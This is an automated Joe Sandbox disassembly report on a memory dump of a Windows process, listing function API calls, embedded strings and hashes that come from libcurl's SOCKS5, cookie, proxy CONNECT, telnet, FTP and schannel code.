User was rejected by the SOCKS5 server (%u %u)., xrefs: 00007FF7F8D43B9D, 00007FF7F8D44116
Invalid SSPI authentication response type (%u %u)., xrefs: 00007FF7F8D43B76

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc$free$htons$__swprintf_lstrchr
String ID: GSS-API confidentiality$ GSS-API integrity$%s/%s$AcquireCredentialsHandle$DecryptMessage$EncryptMessage$Failed to acquire credentials.$Failed to determine user name.$Failed to initialise security context.$Failed to query security context attributes.$Failed to receive SSPI authentication response.$Failed to receive SSPI authentication token.$Failed to receive SSPI encryption response.$Failed to receive SSPI encryption type.$Failed to send SSPI authentication request.$Failed to send SSPI authentication token.$Failed to send SSPI encryption request.$Failed to send SSPI encryption type.$InitializeSecurityContext$Invalid SSPI authentication response type (%u %u).$Invalid SSPI encryption response length (%lu).$Invalid SSPI encryption response type (%u %u).$Kerberos$QueryContextAttributes$QueryCredentialAttributes$SOCKS5 access with%s protection granted.$SOCKS5 server authencticated user %s with GSS-API.$SOCKS5 server supports GSS-API %s data protection.$User was rejected by the SOCKS5 server (%u %u).$confidentiality$integrity$out GSS-API data$rcmd
API String ID: 2697823286-334495253
Opcode ID: d0d708359427caa48cbbf42e49293064df08075f2b55c148ef143d195b9a0e66
Instruction ID: d84b2e07453a614a21702497ef10c2ee7fcdaaf6bb2069c33bac1627f64f0177
Opcode Fuzzy Hash: d0d708359427caa48cbbf42e49293064df08075f2b55c148ef143d195b9a0e66
Instruction Fuzzy Hash: 96922E65A08B4696EB14AF25F8506B8E7A0FF4CB94F880071DE5E47794DF3CD048E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2175C Relevance: 86.7, APIs: 32, Strings: 17, Instructions: 903stringfileCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D217BE
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D217E4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D21810
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D21835
strchr.LIBVCRUNTIME ref: 00007FF7F8D21844
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D21E22
strchr.LIBVCRUNTIME ref: 00007FF7F8D21E49
strchr.LIBVCRUNTIME ref: 00007FF7F8D21E5E
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D21F1E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D21F4A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D221B1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D221C7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D221DD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D221F3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D22209
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2221F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D22235
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2224B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2228E
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22371
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D223DD
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D223F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00007FF7F8D215E4,?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22426
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22443
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22467

Strings

FALSE, xrefs: 00007FF7F8D21F43
localhost, xrefs: 00007FF7F8D21A66
secure, xrefs: 00007FF7F8D219A1
#HttpOnly_, xrefs: 00007FF7F8D21E18
version, xrefs: 00007FF7F8D21B57
TRUE, xrefs: 00007FF7F8D21F30, 00007FF7F8D21FD8, 00007FF7F8D21FF1
path, xrefs: 00007FF7F8D219F0
Added, xrefs: 00007FF7F8D222BB
Replaced, xrefs: 00007FF7F8D222AF
httponly, xrefs: 00007FF7F8D219C4
domain, xrefs: 00007FF7F8D21A31
max-age, xrefs: 00007FF7F8D21B80
%s cookie %s="%s" for domain %s, path %s, expire %I64d, xrefs: 00007FF7F8D222C5
expires, xrefs: 00007FF7F8D21BA9
none, xrefs: 00007FF7F8D22389
skipped cookie with bad tailmatch domain: %s, xrefs: 00007FF7F8D21B17
%1023[^;=] =%4999[^;], xrefs: 00007FF7F8D2187E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strchr$callocmalloc$__acrt_iob_func_time64fclosefopenstrcmpstrncmpstrtoll
String ID: #HttpOnly_$%1023[^;=] =%4999[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$domain$expires$httponly$localhost$max-age$none$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 995170338-2893117712
Opcode ID: 36ed42e4d657f7b36d7ef93ed79e775cdf2d0c13f779136442f5aa4bca992c45
Instruction ID: 51756b7788a2bf245d480e805835f14a12d0f065ea8fe1da3cbf1e1621c5e273
Opcode Fuzzy Hash: 36ed42e4d657f7b36d7ef93ed79e775cdf2d0c13f779136442f5aa4bca992c45
Instruction Fuzzy Hash: D482B321A0DB4682FF24AB21A450279E7A4BF5D780F884531DE6E477D1DF3CF448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D272F4 Relevance: 81.1, APIs: 11, Strings: 35, Instructions: 620stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D273A5
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D273C7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2741D
strchr.LIBVCRUNTIME ref: 00007FF7F8D2746F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D275A4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D275B9

Strings

Ignore %I64d bytes of response-body, xrefs: 00007FF7F8D27A68
Proxy CONNECT aborted, xrefs: 00007FF7F8D27B34
chunked, xrefs: 00007FF7F8D27988
Received HTTP code %d from proxy after CONNECT, xrefs: 00007FF7F8D27D5F
Content-Length:, xrefs: 00007FF7F8D278D5
%s%s%s:%hu, xrefs: 00007FF7F8D274A6
1.1, xrefs: 00007FF7F8D27439
%s:%hu, xrefs: 00007FF7F8D273D8
Failed sending CONNECT to proxy, xrefs: 00007FF7F8D27617
Host:, xrefs: 00007FF7F8D274BE
CONNECT, xrefs: 00007FF7F8D273F6
Proxy CONNECT connection closed, xrefs: 00007FF7F8D27B1B
HTTP/1.%d %d, xrefs: 00007FF7F8D279FE
CONNECT response too large!, xrefs: 00007FF7F8D27C67
CONNECT %s HTTP/%s%s%s%s%s, xrefs: 00007FF7F8D27576
CONNECT responded chunked, xrefs: 00007FF7F8D279A2
Proxy-Connection:, xrefs: 00007FF7F8D274ED, 00007FF7F8D279CD
chunk reading DONE, xrefs: 00007FF7F8D2774D, 00007FF7F8D27ACC
User-Agent:, xrefs: 00007FF7F8D27510
Connection:, xrefs: 00007FF7F8D27935
CONNECT phase completed!, xrefs: 00007FF7F8D27CE6
Transfer-Encoding:, xrefs: 00007FF7F8D27950, 00007FF7F8D27992
Host: %s, xrefs: 00007FF7F8D274D5
Ignoring Transfer-Encoding in CONNECT %03d response, xrefs: 00007FF7F8D2797C
1.0, xrefs: 00007FF7F8D2742F
Establish HTTP proxy tunnel to %s:%hu, xrefs: 00007FF7F8D2737C
Ignoring Content-Length in CONNECT %03d response, xrefs: 00007FF7F8D278FB
close, xrefs: 00007FF7F8D2792B, 00007FF7F8D279C3
Proxy-authenticate:, xrefs: 00007FF7F8D27859
Proxy CONNECT aborted due to timeout, xrefs: 00007FF7F8D27DC7
Proxy-Connection: Keep-Alive, xrefs: 00007FF7F8D274FF
Connect me again please, xrefs: 00007FF7F8D27CC9
Ignore chunked response-body, xrefs: 00007FF7F8D27A82
WWW-Authenticate:, xrefs: 00007FF7F8D27829
Proxy replied OK to CONNECT request, xrefs: 00007FF7F8D27D98

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$callocstrchr
String ID: %s%s%s:%hu$%s:%hu$1.0$1.1$CONNECT$CONNECT %s HTTP/%s%s%s%s%s$CONNECT phase completed!$CONNECT responded chunked$CONNECT response too large!$Connect me again please$Connection:$Content-Length:$Establish HTTP proxy tunnel to %s:%hu$Failed sending CONNECT to proxy$HTTP/1.%d %d$Host:$Host: %s$Ignore %I64d bytes of response-body$Ignore chunked response-body$Ignoring Content-Length in CONNECT %03d response$Ignoring Transfer-Encoding in CONNECT %03d response$Proxy CONNECT aborted$Proxy CONNECT aborted due to timeout$Proxy CONNECT connection closed$Proxy replied OK to CONNECT request$Proxy-Connection:$Proxy-Connection: Keep-Alive$Proxy-authenticate:$Received HTTP code %d from proxy after CONNECT$Transfer-Encoding:$User-Agent:$WWW-Authenticate:$chunk reading DONE$chunked$close
API String ID: 1511779358-154568956
Opcode ID: dc7cc8890859ac3db23d15ba6f3797188adf4fd4f99d112801b590328478e53b
Instruction ID: a0a9b2cddf3638e995fb8a6e3dcab82daecbb4a4af423de66c93d0ceb06c3651
Opcode Fuzzy Hash: dc7cc8890859ac3db23d15ba6f3797188adf4fd4f99d112801b590328478e53b
Instruction Fuzzy Hash: 0E529F61A09B8686EB64FB21A5502B9F390FF49794F844136CB6D072D1DF3CE548E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3A2C0 Relevance: 72.2, APIs: 24, Strings: 17, Instructions: 420networklibraryloaderCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3A337

Part of subcall function 00007FF7F8D39480: __swprintf_l.LIBCMT ref: 00007FF7F8D39513
Part of subcall function 00007FF7F8D39480: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D395B3

WSAStartup.WS2_32 ref: 00007FF7F8D3A3B2
WSACleanup.WS2_32 ref: 00007FF7F8D3A3D3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A40D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A426
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A434
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A44F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A464
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A473
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A48C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A49C
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A4B5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A4C5
WSAGetLastError.WS2_32 ref: 00007FF7F8D3A4EC
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F8D3A548
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F8D3A563
WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1 ref: 00007FF7F8D3A5A8
PeekNamedPipe.API-MS-WIN-CORE-NAMEDPIPE-L1-1-0 ref: 00007FF7F8D3A651
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F8D3A683
WSAGetLastError.WS2_32 ref: 00007FF7F8D3A783
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3A79E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D3A7A8
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F8D3A82A
WSAGetLastError.WS2_32 ref: 00007FF7F8D3A88D

Strings

failed to find WSAEnumNetworkEvents function (%u), xrefs: 00007FF7F8D3A4CB
WSACloseEvent, xrefs: 00007FF7F8D3A45A
insufficient winsock version to support telnet, xrefs: 00007FF7F8D3A946
WSAEventSelect, xrefs: 00007FF7F8D3A482
failed to find WSACloseEvent function (%u), xrefs: 00007FF7F8D3A479
FreeLibrary(wsock2) failed (%u), xrefs: 00007FF7F8D3A7AE
WSACreateEvent, xrefs: 00007FF7F8D3A41C
WSACreateEvent failed (%d), xrefs: 00007FF7F8D3A4F2
failed to load WS2_32.DLL (%u), xrefs: 00007FF7F8D3A413
WSAEnumNetworkEvents, xrefs: 00007FF7F8D3A4AB
WSACloseEvent failed (%d), xrefs: 00007FF7F8D3A789
failed to find WSACreateEvent function (%u), xrefs: 00007FF7F8D3A43A
WS2_32.DLL, xrefs: 00007FF7F8D3A3F2
WSAStartup failed (%d), xrefs: 00007FF7F8D3A3BC
WSAEnumNetworkEvents failed (%d), xrefs: 00007FF7F8D3A8A1
Time-out, xrefs: 00007FF7F8D3A740
failed to find WSAEventSelect function (%u), xrefs: 00007FF7F8D3A4A2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast$AddressProc$File$FreeLibraryRead$CleanupHandleMultipleNamedObjectsPeekPipeStartupTypeWait__swprintf_lcallocstrncpy
String ID: FreeLibrary(wsock2) failed (%u)$Time-out$WS2_32.DLL$WSACloseEvent$WSACloseEvent failed (%d)$WSACreateEvent$WSACreateEvent failed (%d)$WSAEnumNetworkEvents$WSAEnumNetworkEvents failed (%d)$WSAEventSelect$WSAStartup failed (%d)$failed to find WSACloseEvent function (%u)$failed to find WSACreateEvent function (%u)$failed to find WSAEnumNetworkEvents function (%u)$failed to find WSAEventSelect function (%u)$failed to load WS2_32.DLL (%u)$insufficient winsock version to support telnet
API String ID: 1117252068-3753229889
Opcode ID: de5caf042a76388d68ddda5f38a72459d3cc904c31f9323014297b0b27ecbf16
Instruction ID: a91e48f0d636a36c9fb28951fa3b2a056fd3c875aefaab57881adeeeee231465
Opcode Fuzzy Hash: de5caf042a76388d68ddda5f38a72459d3cc904c31f9323014297b0b27ecbf16
Instruction Fuzzy Hash: 6E02BF21B0DB4286EB18AB65E45127AE3A0BF4CB94F840135DE6E477D4DF3CE448E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D34958 Relevance: 70.5, APIs: 27, Strings: 13, Instructions: 483networkstringCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D34A2D
strchr.LIBVCRUNTIME ref: 00007FF7F8D34A53
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D34A73
strchr.LIBVCRUNTIME ref: 00007FF7F8D34B18
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D34B35
strchr.LIBVCRUNTIME ref: 00007FF7F8D34B46
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D34B5A
getsockname.WS2_32 ref: 00007FF7F8D34BAC
WSAGetLastError.WS2_32 ref: 00007FF7F8D34BB6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D34BEB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D34C96
WSAGetLastError.WS2_32 ref: 00007FF7F8D34CBA
htons.WS2_32 ref: 00007FF7F8D34D27
bind.WS2_32 ref: 00007FF7F8D34D3F
WSAGetLastError.WS2_32 ref: 00007FF7F8D34D4D
getsockname.WS2_32 ref: 00007FF7F8D34D9C
WSAGetLastError.WS2_32 ref: 00007FF7F8D34DCF
getsockname.WS2_32 ref: 00007FF7F8D34E3E
listen.WS2_32 ref: 00007FF7F8D34E51
WSAGetLastError.WS2_32 ref: 00007FF7F8D34E5B
htons.WS2_32 ref: 00007FF7F8D34EDF
__swprintf_l.LIBCMT ref: 00007FF7F8D34F9D
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D34FC1
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D35034

Strings

Failure sending EPRT command: %s, xrefs: 00007FF7F8D3504E
Failure sending PORT command: %s, xrefs: 00007FF7F8D34FDB
bind(port=%hu) failed: %s, xrefs: 00007FF7F8D34E07
socket failure: %s, xrefs: 00007FF7F8D34CDD, 00007FF7F8D34E6B
failed to resolve the address provided to PORT: %s, xrefs: 00007FF7F8D34C77
bind(port=%hu) on non-local address failed: %s, xrefs: 00007FF7F8D34D74
,%d,%d, xrefs: 00007FF7F8D34F82
EPRT, xrefs: 00007FF7F8D34FFB
%s |%d|%s|%hu|, xrefs: 00007FF7F8D35017
getsockname() failed: %s, xrefs: 00007FF7F8D34BC9, 00007FF7F8D34DDF
PORT, xrefs: 00007FF7F8D34FB3
bind() failed, we ran out of ports!, xrefs: 00007FF7F8D3507F
%s %s, xrefs: 00007FF7F8D34FBA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast$getsocknamestrchr$_cwprintf_s_lfreehtonsstrtoul$__swprintf_lbindcalloclistenstrncpy
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 2373786591-2383553807
Opcode ID: e361aefa0f85aa2a297509a163f50c228a431893c879840481aaccef3b2f8d77
Instruction ID: f18aecb1856a647d2283e7411403cfc53e827f17ce63ea328f18c11cb26a58c2
Opcode Fuzzy Hash: e361aefa0f85aa2a297509a163f50c228a431893c879840481aaccef3b2f8d77
Instruction Fuzzy Hash: 4012C561A0C68282FB54FB21E4002B9E3A1EF58790FC44031DA6E476D5DE7CE54DF7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3F140 Relevance: 58.2, APIs: 4, Strings: 29, Instructions: 434networkCOMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3F275
recv.WS2_32 ref: 00007FF7F8D3F309
WSAGetLastError.WS2_32 ref: 00007FF7F8D3F317
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3F513

Strings

schannel: encrypted data buffer: offset %zu length %zu, xrefs: 00007FF7F8D3F2D0, 00007FF7F8D3F3BF, 00007FF7F8D3F752
schannel: decrypted data added: %zu, xrefs: 00007FF7F8D3F561
schannel: encdata_buffer resized %zu, xrefs: 00007FF7F8D3F2A2
schannel: enough decrypted data is already available, xrefs: 00007FF7F8D3F1B8
schannel: schannel_recv cleanup, xrefs: 00007FF7F8D3F788
schannel: an unrecoverable error occurred in a prior call, xrefs: 00007FF7F8D3F1DD
schannel: Curl_read_plain returned error %d, xrefs: 00007FF7F8D3F36C
schannel: can't renogotiate, an error is pending, xrefs: 00007FF7F8D3F720
schannel: decrypted data buffer: offset %zu length %zu, xrefs: 00007FF7F8D3F771, 00007FF7F8D3F875
schannel: renegotiation failed, xrefs: 00007FF7F8D3F731
schannel: server closed abruptly (missing close_notify), xrefs: 00007FF7F8D3F7DA
schannel: decrypted data length: %lu, xrefs: 00007FF7F8D3F4AB
schannel: failed to decrypt data, need more data, xrefs: 00007FF7F8D3F6EA
schannel: encrypted data got %zd, xrefs: 00007FF7F8D3F39A
schannel: encrypted data cached: offset %zu length %zu, xrefs: 00007FF7F8D3F5EA
schannel: encrypted data length: %lu, xrefs: 00007FF7F8D3F5A1
schannel: server indicated shutdown in a prior call, xrefs: 00007FF7F8D3F1EF
schannel: server closed the connection, xrefs: 00007FF7F8D3F387, 00007FF7F8D3F6C6
schannel: renegotiating SSL/TLS connection, xrefs: 00007FF7F8D3F646
schannel: failed to read data from server: %s, xrefs: 00007FF7F8D3F707
schannel: unable to re-allocate memory, xrefs: 00007FF7F8D3F27F
schannel: client wants to read %zu bytes, xrefs: 00007FF7F8D3F187
schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00007FF7F8D3F363
schannel: decrypted data cached: offset %zu length %zu, xrefs: 00007FF7F8D3F578
schannel: SSL/TLS connection renegotiated, xrefs: 00007FF7F8D3F688
schannel: Curl_read_plain returned CURLE_AGAIN, xrefs: 00007FF7F8D3F349
schannel: decrypted data returned %zu, xrefs: 00007FF7F8D3F85B
schannel: can't renogotiate, encrypted data available, xrefs: 00007FF7F8D3F741
schannel: remote party requests renegotiation, xrefs: 00007FF7F8D3F617

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: realloc$ErrorLastrecv
String ID: schannel: Curl_read_plain returned CURLE_AGAIN$schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renogotiate, an error is pending$schannel: can't renogotiate, encrypted data available$schannel: client wants to read %zu bytes$schannel: decrypted data added: %zu$schannel: decrypted data buffer: offset %zu length %zu$schannel: decrypted data cached: offset %zu length %zu$schannel: decrypted data length: %lu$schannel: decrypted data returned %zu$schannel: encdata_buffer resized %zu$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data cached: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: schannel_recv cleanup$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
API String ID: 2192408281-1393157870
Opcode ID: b9ee442c326a8007643b060b66e31e147628f45ad83f91821a604472ac44f5e2
Instruction ID: 35546615ed46e53969c58f342ec668caf22f1b7da406eae0b5d363f70c3b0207
Opcode Fuzzy Hash: b9ee442c326a8007643b060b66e31e147628f45ad83f91821a604472ac44f5e2
Instruction Fuzzy Hash: A022C961B08B8697EB59EB21E1803E9E364EF4C748F904132CE6D176C5DE7CE548E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1E590 Relevance: 56.4, APIs: 18, Strings: 14, Instructions: 381stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D1E71E
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E77F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7B4
isalpha.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7D2
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E7DF
strchr.LIBVCRUNTIME ref: 00007FF7F8D1E828
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E849
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E8B4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E8C9
strchr.LIBVCRUNTIME ref: 00007FF7F8D1E8DD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E94C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E995
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E9B5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1E9CB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EA4D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAA0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAE4
